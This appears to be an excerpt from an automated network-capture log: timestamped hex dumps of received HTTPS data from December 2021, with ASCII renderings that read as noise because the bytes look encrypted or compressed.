                                                                                              2021-12-07 12:39:07 UTC617INData Raw: fb 60 aa 49 b4 60 b9 e2 7b 43 4e e3 41 84 c4 cd 5e 0e 1e 1d ea 96 4b 02 1a 0e 36 a0 9f 7a 77 53 46 9b e7 03 c4 b8 3b ce 2f c3 71 c2 de d2 a2 e9 01 22 85 22 8d 89 dd 25 8b 28 0d a7 3d 86 bb 30 be 66 4f a9 76 31 3b 78 c7 71 4a 71 87 9d b3 4d 41 6a cc 99 d4 c7 1d 58 8c 77 30 c0 8b a6 36 15 bc e2 42 7c a3 ad 5e 45 5d cc 0e 65 8e 35 8d ed 6f e1 26 18 7c 46 26 d1 a2 de c3 92 21 a3 37 50 10 b7 36 f9 45 73 22 62 9d 00 48 f4 66 c8 b7 fa e1 c2 a3 a4 7f 89 8e 18 92 96 0f 2e f7 89 14 d8 09 35 e6 0e 1b e2 c9 0f 21 9b a7 02 53 63 4c e5 4d 3b cd ac 01 88 e3 9a da a7 c0 a5 3b d1 e6 ea ae 3b 8f 46 fb 14 06 3c 2e 0e 97 67 03 92 07 37 96 b1 82 90 bd f6 32 48 05 f8 1b de b8 f7 3a 6b 69 18 8c 39 c1 12 8d 5f 5b 57 49 da 9e 60 7b 57 fa 12 6d 4d 0e 3d 48 aa 88 02 d7 b9 ec 38 7b
                                                                                              Data Ascii: `I`{CNA^K6zwSF;/q""%(=0fOv1;xqJqMAjXw06B|^E]e5o&|F&!7P6Es"bHf.5!ScLM;;;F<.g72H:ki9_[WI`{WmM=H8{
                                                                                              2021-12-07 12:39:07 UTC625INData Raw: 60 8f 81 f9 5c d2 d3 a8 ae e7 90 be 36 f8 42 47 ff c6 70 09 64 f8 cd 19 5a 33 b6 b2 62 ad fe 36 84 ff 1d d5 b6 a2 46 f0 9a b6 86 95 49 09 e7 d6 d3 da 76 bd c8 fd 87 95 13 54 98 0b 81 1c d0 2c 4d c8 51 ef 6e 09 35 9d 82 d4 6f f8 e2 26 00 bd c7 15 09 4a aa 08 3d f6 98 39 71 f8 2c 27 14 60 dc a3 15 de dd 63 40 67 fc 6c 9b ea 0c 1a 9d 54 4c de c6 ee 7c a1 74 75 f9 2b 7c e8 d5 59 a3 bb c0 c9 29 9d e9 92 37 6b dd 40 d3 c3 03 96 88 cd e8 3b f5 5c fc e7 35 67 e4 14 f6 a9 bf a9 68 24 1c 60 88 b5 ac 16 61 1c 6a 96 5c 0e 6c 86 d3 b8 fb 1a 5a 98 fc 85 66 3a dc b2 70 7b dd fc 7b d5 da 34 c5 ba de 7e e1 0c b1 11 98 51 c0 d9 47 62 97 23 34 6b 42 66 44 01 1a c1 50 4b bd 97 f9 61 32 20 59 f7 67 16 99 47 6c d5 70 eb be d4 21 7e 4b bb 75 6b 84 61 77 9a 04 c3 e8 30 5d 50 61
                                                                                              Data Ascii: `\6BGpdZ3b6FIvT,MQn5o&J=9q,'`c@glTL|tu+|Y)7k@;\5gh$`aj\lZf:p{{4~QGb#4kBfDPKa2 YgGlp!~Kukaw0]Pa
                                                                                              2021-12-07 12:39:07 UTC633INData Raw: 61 94 83 8f 26 04 ae d6 3d 8e 17 b0 c6 80 5c 20 97 3e b8 bc 07 c6 6f dd 02 91 76 49 6e 93 ea b4 77 ca ff 42 03 26 5c b7 b7 08 06 36 ea f7 a8 62 f3 94 90 05 e9 66 b7 d4 74 64 31 7a e0 6b 0f f2 54 7a a2 7f 52 b6 bf 7e 95 d3 db 16 93 f0 51 5d f5 c9 ce 7c 65 60 eb 80 01 79 05 f7 da e4 a3 09 85 b3 d2 86 0d 8f 2f c7 68 08 e1 68 63 3a 4e 14 a3 18 9e 05 3d 0e b3 31 3d 13 ac 8a 73 4a 89 ae f2 2e b2 04 72 f0 55 6a 74 ed 37 8f 7d 4a 69 39 ee 2c 69 42 04 c2 6a e0 dd 90 96 8a 96 20 ae 68 50 60 88 da b3 57 3f ee 2d f4 52 84 59 39 98 75 ac 02 c3 cb b1 f4 fd eb ac 53 01 64 41 eb 21 7e 87 05 6a 09 9c f2 b3 49 87 d9 04 5c 8a 73 a7 7d 70 4c 7b ee c1 e5 32 3e a0 f5 4d 57 b9 2b db 9b 2c e3 63 88 2d 3a be 52 0f b5 a5 c8 6f f8 5b b7 98 38 77 b4 d7 38 5e d2 34 ee a5 69 65 c8 37
                                                                                              Data Ascii: a&=\ >ovInwB&\6bftd1zkTzR~Q]|e`y/hhc:N=1=sJ.rUjt7}Ji9,iBj hP`W?-RY9uSdA!~jI\s}pL{2>MW+,c-:Ro[8w8^4ie7
                                                                                              2021-12-07 12:39:07 UTC641INData Raw: fd 3d 35 02 71 ac f7 30 54 58 2b 61 30 ca a9 99 78 e5 8b c9 d2 39 c7 17 56 e8 ae c1 39 03 89 ee ce fc 5e d3 56 fd a7 68 98 3c 90 0b 6e 0a 2a bb cc 15 9f 6c b0 1a de cd 16 93 28 af 84 1d 2c 55 f0 c8 44 e4 6c 3c d6 ec ef d7 0b d8 1b bb 28 67 d6 b2 e9 64 ed dc e7 27 81 c2 63 45 64 b3 0f 42 bd db 9a d4 1e 97 72 3b 38 41 bd 35 f4 73 8a 9d 98 3e 8b b2 4e f7 38 d4 ba 5c 4f 4c b6 99 f8 35 c3 c6 af 58 0c b5 cb b6 89 9d a0 3e 78 47 93 5a b3 a6 15 f7 9c 41 a0 2c 23 de bb 0d 77 e1 b2 6a 28 8f a0 74 7a a0 7b 89 d0 34 65 8c cc 11 d5 a6 cd 9c a2 3f 8c 3c 85 5e d4 85 00 c9 fa ef e5 02 09 ac 84 14 be 09 24 41 f2 ce c6 4f bc 29 d3 d1 3d 9d e1 54 50 a4 87 21 41 95 37 06 b9 6d c0 ee cf 67 60 b9 6b d2 d0 bd be ea 99 c7 33 2c 8d 16 ac cd ef 50 99 bc cc 36 90 9e 3e 47 5a d8 1e
                                                                                              Data Ascii: =5q0TX+a0x9V9^Vh<n*l(,UDl<(gd'cEdBr;8A5s>N8\OL5X>xGZA,#wj(tz{4e?<^$AO)=TP!A7mg`k3,P6>GZ
                                                                                              2021-12-07 12:39:07 UTC648INData Raw: 5d b1 ca 78 91 16 aa 6d 03 21 60 c1 fc bd 7e fd 9b ce 7a 3b 85 a4 6d d3 50 df 03 de 04 0e 69 74 b8 24 4e 3f af aa 17 39 78 18 41 8e ef 39 c2 4e e0 3b c1 41 b8 dc ab ed 96 d7 78 bd 3c e3 f3 50 12 58 50 37 fb 7f e5 e1 04 9f 06 15 ab 95 c5 bb ad d3 a3 84 44 12 d5 87 cf 49 73 96 92 69 fa 9c 1d b7 df 5d 7c 25 ee 2a 14 89 85 e2 83 e1 2d 4e 88 7d f4 44 ec 35 de df d3 f9 30 86 82 72 92 ee b1 c7 38 61 24 ae 26 b0 6b 26 39 b0 e8 86 9d 46 ba 0c 64 fe 19 88 c9 2e 75 89 2d db 38 08 cf ab 7e 45 9a ee 61 67 d7 4d a3 f6 0a 14 64 51 63 de 33 b3 56 23 ca db 28 b5 4d f3 09 d9 4b 1a fa 46 86 f1 94 9e 98 7d 7b c5 84 16 1a e0 f0 b8 db 1f 34 50 3c 70 c7 a1 a3 7a 82 cc f0 07 4d b6 6d 40 0b 1a 72 4a a5 48 67 26 bf b6 c8 94 8d 29 70 00 a1 40 eb 50 0d fa 43 e2 b9 b2 66 80 4b ce 52
                                                                                              Data Ascii: ]xm!`~z;mPit$N?9xA9N;Ax<PXP7DIsi]|%*-N}D50r8a$&k&9Fd.u-8~EagMdQc3V#(MKF}{4P<pzMm@rJHg&)p@PCfKR
                                                                                              2021-12-07 12:39:07 UTC656INData Raw: ee c4 15 be 85 41 d1 25 ee 1c 7c fb 36 94 ad 9e fb 09 9b ea 2a b1 50 fa 85 d1 92 b0 11 fd 5a ea ac 8c a3 a1 1e 77 dd cf 6a 98 44 e9 c0 44 e4 a2 2b ff fd ed 70 b2 41 17 e6 a2 aa 45 9f 4e 52 08 61 53 c2 66 01 cc b4 ae 3c d2 72 58 72 67 bc 16 d3 58 fe a6 87 39 51 c7 78 72 83 ae 7c ee 81 f6 c2 5d 8a 34 7d 85 56 34 3e ac 98 9a 23 a6 14 ad 5d f8 26 f3 fb 28 1b 49 32 81 71 76 e2 fc be 2e 37 d8 b9 4b e0 8c 1b d1 18 3d 00 ad 19 25 bf d1 b7 de cb 8b da 68 dc 6a bb 8d 15 e3 c9 50 8f 7a 55 ff 3d 1f 9e 0b 6e b1 4e 64 e7 72 ca 0e 74 51 8b ff 8c f4 bf 7b 3b 23 59 21 7c 37 f6 9d b3 38 27 5c e7 e0 6c 58 9c 0c 2e 86 ff 21 d7 a0 d1 11 02 7c a3 81 91 d8 df 5a 56 df d8 c6 f0 ec d1 57 30 51 96 fe 35 fe 3b 59 ac 49 61 c9 9c b1 16 aa 74 3d d1 8d f7 1e 1c 9b 25 63 5a e5 f7 f2 71
                                                                                              Data Ascii: A%|6*PZwjDD+pAENRaSf<rXrgX9Qxr|]4}V4>#]&(I2qv.7K=%hjPzU=nNdrtQ{;#Y!|78'\lX.!|ZVW0Q5;YIat=%cZq
                                                                                              2021-12-07 12:39:07 UTC664INData Raw: 81 45 d3 6e 56 78 d0 ae 4c 42 9d 2a 90 78 b6 dc 31 ac f7 79 d8 d9 b3 e2 2c 5b 90 5c dc b4 75 9e d5 ee e0 c2 da 2b ad 78 84 da 7d 35 2f 77 e9 a7 20 a2 e8 02 4c 7d 73 44 74 f8 a0 4e 45 ad b7 cb f4 20 3d 14 67 9e 63 6d d8 69 4e eb 96 19 c1 5b e9 9b 9f 08 97 96 79 d4 e0 62 fd d5 2c a5 a7 3d b7 d9 61 00 c8 64 3f 80 b6 50 63 e9 33 81 64 07 4b c4 30 29 5b d5 dc c4 17 20 31 f2 63 e5 10 11 12 ae ea 52 23 89 63 67 b9 27 d4 eb 15 9d 41 1c 25 1c b7 37 b4 93 ba a1 de 03 02 f5 38 bf 71 92 0c 54 9e e4 9c 16 64 1f b5 09 42 1f f5 0b 69 e5 21 2d 66 7c e9 69 13 30 9d f4 31 7f c4 cd b3 40 52 df cf 6c ea 78 ac dd 24 2f a7 1b 25 0f 25 8c 18 1d 7b 76 c0 87 94 9a 1f 2a 28 1f dc be 47 4b c2 bb ee c9 07 31 6c 54 90 23 88 bb df 67 0d f9 a6 9c 1e a8 ce 76 51 6c 9f af b3 60 62 7b 13
                                                                                              Data Ascii: EnVxLB*x1y,[\u+x}5/w L}sDtNE =gcmiN[yb,=ad?Pc3dK0)[ 1cR#cg'A%78qTdBi!-f|i01@Rlx$/%%{v*(GK1lT#gvQl`b{
                                                                                              2021-12-07 12:39:07 UTC672INData Raw: cf c3 44 e6 16 1a 3a dd 4f 69 a3 ed b9 45 c8 d9 34 d4 ac c7 43 50 23 2d 57 53 4d f8 79 a1 53 3e 56 c6 c1 48 d3 59 ba be be b9 80 8d 0d 88 7a 5f 7b b7 3c 2c 51 ce 3e 8c da 4c 39 33 ac 55 da a9 42 18 6b 34 d1 bd 8d 5e 0d 56 2e ee c1 5d 10 2b 9d 7d 9a 2d 0f f8 d5 fb be 43 9e 30 b5 de 88 f6 94 38 8a f4 d9 ce 98 b3 49 3f 0a 04 5f c2 ff 12 ca 4e 44 97 72 ff 92 61 46 36 52 0f 18 90 85 dd 57 43 72 a2 00 af bf 33 88 5a 96 4f 5b bb 00 d1 12 98 7e 90 e3 5d 23 1a f7 e1 81 88 b9 7a b0 4e b1 f2 09 e4 97 ac d8 34 ea 9e 5d 0f e5 84 ed 8c 39 d3 16 d0 ea a6 e6 27 79 84 45 e6 4b 8f 0c fe 06 0b f7 33 52 75 06 9f f1 c1 90 64 9c b2 af e8 6c 95 75 ec 6e 9a 65 a1 df 20 5d dc 3f 4c b5 cf c3 37 c3 00 57 22 48 3e cb 12 e6 34 94 f5 35 69 21 96 36 d6 fb 1b 47 02 13 fa ef 44 20 ec 21
                                                                                              Data Ascii: D:OiE4CP#-WSMyS>VHYz_{<,Q>L93UBk4^V.]+}-C08I?_NDraF6RWCr3ZO[~]#zN4]9'yEK3Rudlune ]?L7W"H>45i!6GD !
                                                                                              2021-12-07 12:39:07 UTC680INData Raw: 2d 20 31 c8 83 af 07 31 47 66 d4 47 3f 83 b5 db ff d4 f2 32 b7 2e 80 7c 67 7e 71 00 b5 d7 04 57 d7 b8 23 e1 7e 0e ac 0c ed 48 9f d4 54 76 2c 98 d9 10 99 35 a8 46 e0 bb a5 5c 29 6b ff 5f 55 7c 4c 40 60 6e 2c a1 08 5d 71 16 4b 38 fd bb 94 57 98 7d 75 c3 37 5a 51 9f f8 dc e7 4e da 0a 98 1f a3 46 f0 b3 39 60 38 04 6d e5 66 8b a2 d0 ae 24 d9 2e 74 14 3a 13 d8 13 90 2a c9 de 67 df f2 a1 a6 7f 76 e7 60 f8 04 74 00 93 e0 7f 50 ec f8 81 15 45 5c f0 84 9a 4b 9a 3a 94 28 60 77 af 9c 9b d0 97 45 d4 04 2c 9b bc ad 40 35 8e 63 e5 c6 3f dc fe 39 28 5d 43 ce cb c5 71 3d d8 73 19 01 61 f1 9c 35 7d 5d 11 b7 e3 37 41 84 11 cb cc f4 b8 59 c5 4d 69 66 99 31 cc 71 dd de 26 22 97 1b ae 01 ba 1a 18 d7 63 19 99 1f 69 31 11 66 b7 4b dc 21 6e 5a 05 0d e0 f0 84 69 18 9f 15 13 dd 69
                                                                                              Data Ascii: - 11GfG?2.|g~qW#~HTv,5F\)k_U|L@`n,]qK8W}u7ZQNF9`8mf$.t:*gv`tPE\K:(`wE,@5c?9(]Cq=sa5}]7AYMif1q&"ci1fK!nZii
                                                                                              2021-12-07 12:39:07 UTC687INData Raw: 87 6b f7 d2 5c 9f 71 2f 32 66 8d b5 8c 98 14 48 a2 f6 11 c5 00 eb fd a9 9f d2 ac 55 5f e6 68 11 e5 0d 89 25 fe cf 67 21 6f 77 68 13 b6 14 95 30 ad 46 70 9d 98 1b 39 7f de 3d be 26 85 7a af 39 d7 47 67 9b 9f 6f 5c e0 d2 a4 81 ca fe 06 dd f7 0e 11 64 5f 78 34 76 c9 7a a2 84 51 fe e8 02 47 6a 10 8e 59 93 74 eb f4 73 db d6 18 13 15 ca 50 05 59 47 8e ef 71 f8 7e 52 ef d4 95 38 51 98 54 a5 bd 06 73 c8 3b 24 7f e6 f7 00 72 63 02 c9 23 25 50 f8 74 c9 52 a1 72 7e 17 ec fd 42 03 67 f9 3e 6b 6c 63 87 21 ab 6d ee 96 e4 90 1e 6c d2 9e 16 e1 cf 11 ed 1d a7 ef 0e d1 70 75 d7 91 4b c8 ab 3e 17 ea 0f 37 60 0a 8c db f5 e1 19 73 a5 b1 24 ce 72 13 3f 3c 36 6e fa 90 5b b3 75 6d 26 9c 12 12 7d 0b 99 93 10 f2 14 7a bc d2 92 d6 20 b2 49 3c 6d e1 7b 80 f0 24 63 f3 61 ee bf e7 73
                                                                                              Data Ascii: k\q/2fHU_h%g!owh0Fp9=&z9Ggo\d_x4vzQGjYtsPYGq~R8QTs;$rc#%PtRr~Bg>klc!mlpuK>7`s$r?<6n[um&}z I<m{$cas
                                                                                              2021-12-07 12:39:07 UTC695INData Raw: 1f 4d 0c 12 a1 ff d6 d5 49 10 eb fc 9a ed 95 8e 34 1d aa 55 e4 cc 06 1a 95 96 a6 82 79 81 27 76 6d e7 00 36 ae 5f 56 da a2 ce 70 24 b8 cc 2f 2c 8b af 1f f1 f6 27 b5 fb 46 60 f4 9d 49 fc 36 92 87 f5 6a dd a4 6b 76 45 6f 1d 5f bf ab d0 45 2e 32 58 69 7b b5 2c b8 b9 f3 bf 82 ac a5 1d 24 bb 24 7b f3 3a 0a df f7 28 6a 2d 40 65 f8 bc a2 01 69 9d e8 30 1f af af d5 21 18 34 ac 3e 65 f8 19 53 4d 16 0b 32 ab 55 7c 7d a8 e2 52 be af 23 f3 52 95 a3 61 52 78 2d 16 b0 28 bb 5c b3 3f 91 75 82 07 e3 27 8e bc 1a 64 96 f4 35 27 8b 65 af 03 43 67 b5 c1 4c d3 c7 a8 07 da b7 6f 58 40 1d 19 a8 14 27 36 25 03 e6 86 5d a8 e7 1f 00 4b ef fe ed 5b aa 3f 6e 1b 4a a8 46 dc b7 48 14 3c d7 08 6d 2d dc da af 29 1d 5d 98 67 56 e8 2e c1 76 ad 88 89 50 32 d7 81 f8 5f 37 9a b7 ce 6b 72 64
                                                                                              Data Ascii: MI4Uy'vm6_Vp$/,'F`I6jkvEo_E.2Xi{,$${:(j-@ei0!4>eSM2U|}R#RaRx-(\?u'd5'eCgLoX@'6%]K[?nJFH<m-)]gV.vP2_7krd
                                                                                              2021-12-07 12:39:07 UTC703INData Raw: 40 96 64 36 47 f9 1e 13 36 2c dc dd d9 31 5e ec 6b b3 f0 58 09 b3 2b a5 23 be 16 63 43 99 ec cb ca 7e 07 b6 26 51 0a 28 2d 77 b1 d3 b5 a8 49 b2 47 0e a7 45 1b bb b2 90 2e 2c 7f ad 29 ed 01 e6 fa c0 51 9d 95 73 47 75 31 3d 15 f1 04 40 c8 e1 33 24 73 2d c3 ea 05 bf 91 8c 8e da 6e d7 03 09 94 9d ab 02 0a 3d 6b a6 d7 75 00 ad de c5 12 b4 14 dd e4 88 3f 3d d7 33 59 cb 82 a9 7c ab af d0 b7 01 41 f3 13 ed de a1 04 48 5a ef 1f 99 df 55 e7 f5 40 d0 a8 7a 15 2b af c3 86 ca 58 2d bf 9e 29 28 a9 04 05 70 69 1e d6 e0 5c 43 55 51 ab 4d d6 44 5d 25 23 c3 bf 8a 30 95 71 75 ae 43 13 7b a8 5c e5 c9 96 1b 5e 12 d3 99 25 a6 ee 07 d2 90 b8 27 d3 b6 cb e1 a0 3d 25 1a 6e a2 7a 37 d2 2e 09 cf 6e 8e 3d 5b 67 8d 0e 9d e3 99 90 73 a9 84 ce cf 29 af fd 6f 4e 92 83 38 a5 da 69 8e 12
                                                                                              Data Ascii: @d6G6,1^kX+#cC~&Q(-wIGE.,)QsGu1=@3$s-n=ku?=3Y|AHZU@z+X-)(pi\CUQMD]%#0quC{\^%'=%nz7.n=[gs)oN8i
                                                                                              2021-12-07 12:39:07 UTC711INData Raw: 6f 52 e0 e8 a7 49 3b 2b be 07 8a cf 9a cc 49 24 48 13 e7 6d b7 02 c7 91 1d a9 9a 91 6d 42 f4 a5 82 0c 14 9c 83 cc 67 10 d4 a5 e5 c6 fc 74 a8 9d c8 a1 29 6f 21 33 57 32 e9 8a 5f 21 03 89 88 cb 2c cb 74 a7 02 a0 e2 a6 ed 35 51 7b 0a c3 b5 39 d5 5a 1b 09 93 91 70 4a e5 d8 ed 52 ee 79 1c 33 d6 0c b8 76 c8 36 46 5a d3 dc ac a9 1b e4 52 00 8b 37 f1 4c a5 d7 74 a8 76 77 71 9a b6 cd ab 83 66 a8 c9 d6 e5 47 eb fd b5 68 a0 cf 76 02 67 81 91 7b 2c d4 92 af 7c b5 4a ef 8b 13 b0 59 cd e5 c0 c0 8a a8 f3 a5 99 da d0 73 b4 10 21 d9 8d ae 7f a6 9b 72 e2 a9 9e 6d 32 6a 24 cb df e5 37 aa 1a 72 12 c0 8c 07 65 d1 78 44 c2 e8 f0 25 50 d6 c6 35 4c b2 08 66 a8 8c bf 19 5c 47 f1 2d 69 6c 5c 25 6e f5 36 44 67 fd 50 07 a6 99 78 37 6e e5 80 1a 28 6d 33 ba 69 da 71 33 fb 5c ca 45 b6
                                                                                              Data Ascii: oRI;+I$HmmBgt)o!3W2_!,t5Q{9ZpJRy3v6FZR7LtvwqfGhvg{,|JYs!rm2j$7rexD%P5Lf\G-il\%n6DgPx7n(m3iq3\E
                                                                                              2021-12-07 12:39:07 UTC719INData Raw: 5f a6 00 ed b5 60 86 07 2c 43 3f 8e a7 c4 24 1c 9a df a6 82 fe 3e 7c f6 cf d1 0d ee 34 87 8a f1 d5 ff 79 47 59 4d f6 d3 fc 70 8c 3a f9 01 39 94 d7 c8 6b 91 b5 e8 12 bf 61 86 b4 a8 ce 43 82 69 9a 37 49 d0 2d 8d d4 55 4c da 81 6a d4 e6 6d 06 f8 50 82 68 ec 0c 72 4d 21 31 5e 59 9d 93 60 8c 39 47 7e 26 1f 3c 24 bc e6 46 18 d2 d8 e1 ac d9 ac ba 12 9f 49 1d 7a 23 b2 3e 7d a7 a2 a1 54 63 c3 e1 ac 41 2a 59 05 7a d8 55 2a 8e dd 4c cc c7 6c 43 64 83 e6 cb d6 17 a9 fc 00 de ce 3c 8d 74 3e f6 40 05 09 d0 f3 5d aa a6 2e 19 64 6d 0a e8 a1 50 2a 07 e6 de 06 61 89 0c 0d b6 d7 57 55 59 63 ba fe 2b 4b 6c 07 02 c1 67 26 42 76 65 e7 9c 57 07 7b 20 8d 85 80 f3 c7 ce bf 8a c0 4e 6d 1d 4b 1f 1c 15 80 9a 63 ef 68 b5 cb ef 33 31 6b 41 96 c3 70 7c f0 cf 49 c1 6c 56 ec 55 99 38 bb
                                                                                              Data Ascii: _`,C?$>|4yGYMp:9kaCi7I-ULjmPhrM!1^Y`9G~&<$FIz#>}TcA*YzU*LlCd<t>@].dmP*aWUYc+Klg&BveW{ NmKch31kAp|IlVU8
                                                                                              2021-12-07 12:39:07 UTC727INData Raw: 0f 2e 98 d3 6e a7 a6 92 09 a4 7a 5d 4b 13 94 a2 41 2b 3a 63 6f e0 72 cc 58 61 56 91 50 2c ed a7 86 d4 23 49 b3 12 77 a7 09 b4 61 07 3b bc 22 ca d0 9e 40 6c 51 a8 1d e6 9b b6 5e f5 de f0 fc 23 56 ae 91 a7 cd c5 b1 58 35 ed 59 b8 d0 70 9c 90 44 ce 5a b2 07 42 64 f4 dc e7 0e 3e b6 4e f9 b0 45 1e 31 2a bf af 66 98 3f c1 67 96 87 75 21 f0 13 93 0e 8f 17 bd 1e c9 94 ff 82 15 e3 b2 cf 52 4d 99 c4 ac 3b a1 a9 06 24 65 2f 48 8b a1 4a bf 1a 82 19 81 81 7b 92 0f 4a 53 59 c0 b2 1d 65 b6 c1 d4 34 b0 3a a7 d3 2a a7 d0 b5 fa ba 3a 9b 4c cc 2c 96 92 2f 7a f1 67 72 c8 2b d4 0d 09 4d dd bc d9 43 25 5f 41 82 c2 65 a9 a6 6b 38 af 66 91 05 c2 01 1d 72 a9 e1 d3 94 4e 16 f1 5f 50 86 5b 0c 22 82 e0 be 19 ad 0d 36 e4 d7 8d 2d 0e 18 bc 1b 79 36 8e 74 0c f4 17 e8 33 c4 f1 46 ce 32
                                                                                              Data Ascii: .nz]KA+:corXaVP,#Iwa;"@lQ^#VX5YpDZBd>NE1*f?gu!RM;$e/HJ{JSYe4:*:L,/zgr+MC%_Aek8frN_P["6-y6t3F2
                                                                                              2021-12-07 12:39:07 UTC734INData Raw: 0c a9 1b 8e f5 79 7e 9e a4 30 87 d2 4c 00 15 a6 0b fd 10 ac 89 55 e1 11 1a 04 a0 b7 9c 32 5d 24 4d 1b 28 23 2c e6 5a 1e b9 09 84 9b 83 29 d4 b8 91 80 49 ae d2 1c c5 3a 11 ac 15 69 50 2b ba f9 28 79 25 f5 c9 93 fb 71 5f cc 42 55 c5 7d 4c 0b ee 24 c2 06 71 91 25 68 3d 15 d1 ca 87 50 76 b8 3d a1 e9 96 d2 29 24 0e e0 fd 27 bb 51 24 14 c2 6e 72 f8 65 36 f5 8c 07 f0 a9 23 2d 6c 5e b5 5d 28 da f6 68 2e e3 22 cd 90 79 e5 c5 b4 7e 4c 3b a1 eb 5a 80 8c e8 f3 b8 57 87 77 74 59 a2 df ca 97 fe 17 38 f5 7e fc f8 bb 04 d1 56 37 a1 e7 9f 37 c1 c4 73 f9 dd 31 8c 95 66 ae 88 e6 45 1c e2 1b 86 88 74 38 e4 0f bd f1 c6 1e 50 01 40 77 27 f0 cc 48 71 cf 40 2f 8f ef 44 9e d2 b1 ad 02 26 1d 82 ed 43 7a aa 08 d5 75 f0 60 1a bd b0 6b 95 c9 fc 0f 7f b1 f0 cf 15 9f 7f 08 db ac 35 32
                                                                                              Data Ascii: y~0LU2]$M(#,Z)I:iP+(y%q_BU}L$q%h=Pv=)$'Q$nre6#-l^](h."y~L;ZWwtY8~V77s1fEt8P@w'Hq@/D&Czu`k52
                                                                                              2021-12-07 12:39:07 UTC742INData Raw: 4e a3 92 8f 13 04 e8 b2 c7 89 86 7a a4 33 e8 74 af c0 63 10 a0 e6 e3 48 55 40 81 2d 08 0a d4 2c 14 ce f6 d8 e8 ba 0a 31 a8 87 bb 69 cb 37 c3 67 51 38 e9 8e 85 14 99 03 5d b0 1d 53 57 7c 9e 30 d6 f9 13 41 2f 44 d9 d8 03 53 73 cf 52 86 5f 47 b5 ff e2 b1 b9 5f 6a db f2 18 7e 11 81 f3 b9 cf 18 30 66 ab cd 74 b5 b1 6b 77 03 7d 10 1a b7 0f e4 4b 6b 64 ab eb 0e 5e 8d 9f bd 81 9f 50 fc c8 7a e4 74 27 8b 75 1e 1f 4d e6 9e ab 09 40 e9 0e 17 ad a3 f4 eb 01 4a f6 e2 d9 6b 53 c3 ba 69 a7 f9 74 c5 fe a4 39 ff 95 d0 97 bb 11 e7 86 f1 19 38 10 e2 93 3b 32 47 fd 9e a9 f5 70 f8 4f e9 9e b6 f9 a4 ef 90 8e c4 0c 30 75 2d d4 26 52 68 f5 b5 28 47 25 59 35 ce e8 87 8f 86 a7 67 96 09 f2 cd 09 bd a8 90 c5 d9 d0 f0 22 81 ea df d1 c9 99 bc b6 3c f5 47 3f c8 45 98 86 b6 42 6f 44 83
                                                                                              Data Ascii: Nz3tcHU@-,1i7gQ8]SW|0A/DSsR_G_j~0ftkw}Kkd^Pzt'uM@JkSit98;2GpO0u-&Rh(G%Y5g"<G?EBoD
                                                                                              2021-12-07 12:39:07 UTC750INData Raw: 1e 20 81 5b 2e d7 86 2b 25 c2 c9 5a 65 41 7c 94 64 83 11 4a b8 b3 b0 c5 3d 77 48 f8 aa 12 d2 82 6d 74 88 a0 42 4b cf 02 ab db 61 79 66 29 29 d0 5c f6 ae 82 f1 c0 51 cd 2e 82 e6 42 39 1e fb c8 0f 48 17 ea a8 72 15 6b 76 63 02 12 d1 a2 77 bf c0 73 ea f9 97 45 7e bc 61 be 66 ea 85 be 9a 50 0d bf ec fd 04 9b 9c 9d 99 0b d6 d4 1e 2d c0 48 47 05 d9 e5 7c d1 0f 88 f8 74 ce b5 21 f0 0f a5 b3 f9 ca 0d d0 6e 89 03 05 92 77 c9 ae 68 66 78 0c e9 7d 00 37 8f 4d 48 de 09 3d c6 6c b3 58 b8 0e 2c ff 1a 12 d4 a4 65 ec 7b c6 5a 1e b0 e0 4e 45 ad d2 e6 3b eb 7a d3 d4 06 9d e9 d3 9b ae 1c 62 b2 05 4f 6c 21 70 59 90 8b 58 01 07 41 6f 72 2b b1 e6 1b 55 e8 f8 d0 5c 2b 06 ef 69 9f fe 10 71 4b 31 4f 66 a7 f7 85 ae ea f1 43 7e ba e7 fd d6 b2 84 c8 5c fd 5f f1 23 c4 9a 2d d3 fb 9a
                                                                                              Data Ascii: [.+%ZeA|dJ=wHmtBKayf))\Q.B9HrkvcwsE~afP-HG|t!nwhfx}7MH=lX,e{ZNE;zbOl!pYXAor+U\+iqK1OfC~\_#-
                                                                                              2021-12-07 12:39:07 UTC758INData Raw: 77 52 88 6b ab 03 9b 60 4c 88 08 26 20 bd 37 fb 5a 40 3f 1a 65 ef e7 21 dd 44 6c b4 e5 0e 35 2d f6 2b c7 08 0f 99 28 fd dc 1d 89 48 a7 48 1f 00 0a f8 d7 14 dd 9b a5 9f 6b c5 01 2c 70 5b be ce 0a db 7d 02 08 fb 56 6c c5 16 70 27 6b 12 aa 18 30 24 30 8f 0d 86 3a 65 69 a5 94 e7 fd 3a 27 08 d4 69 de 60 6e e4 50 12 fa 84 18 07 ee d8 fe a2 76 42 3c d9 59 b7 3a d3 f6 f6 65 be 48 64 84 af bf cb fd 2b 31 77 2f 55 b8 40 b0 4b 4a a4 52 2e 90 0b 04 3f 97 d8 23 07 0d b5 d5 46 40 aa ff 5d 8e 2c 81 cb eb 5b d7 38 ff 59 9b c5 7f 0b d8 bf 9a 00 c1 de 86 a5 1c df 1f 30 97 0c d2 09 ba 74 78 ea 84 ed 25 31 20 b6 8a b1 66 e2 ce e9 9b b7 e0 06 fc 90 ca 70 ea f8 4f 47 15 c5 de 3c 24 db 06 36 da 9e 67 b5 4b de 7f bd ae 3d 8f ff e3 9e 07 97 3e 34 2a 56 5a ab 25 c6 3b 02 83 d5 4f
                                                                                              Data Ascii: wRk`L& 7Z@?e!Dl5-+(HHk,p[}Vlp'k0$0:ei:'i`nPvB<Y:eHd+1w/U@KJR.?#F@],[8Y0tx%1 fpOG<$6gK=>4*VZ%;O
                                                                                              2021-12-07 12:39:07 UTC766INData Raw: ea 68 78 9a 9e 2d 7f 2d 1b 59 87 c7 55 01 cc bb 54 fc 77 67 86 5d b4 cb f4 8a e1 21 73 51 1c 6c 7d ec 21 48 44 ee b3 20 fd d7 cc ad 14 56 16 af db cd 66 c2 4e 74 d4 5d c1 46 d3 a3 ad 56 e1 38 93 72 6a 7d 89 df 37 1d b2 90 c0 5e 11 46 fb 4a 98 f3 fb 48 b9 24 ad 62 b3 02 66 6a 4a b7 75 35 3d 40 49 fc 34 36 12 e7 b1 06 63 ed e5 c8 f2 8e 8c 4a 65 2e 09 41 74 71 53 11 1c d8 ac ed 6e 1a 04 8a 5a 2f f3 75 0b 34 74 a6 d7 8b 6b bc 07 54 4f 63 f8 fc 5b 93 c7 e1 4d ad d4 b6 4f d1 03 be 8a f8 6b 29 a4 0f 1b a9 dd 7f 12 1f 22 01 ea 13 89 7f a8 42 e7 22 57 47 b9 23 c4 73 a7 06 cb 81 88 f1 fc f8 5c c4 f1 98 d8 6b 63 4a b4 46 d7 3a 88 19 e4 5b 1f 95 83 d3 66 f1 ed 20 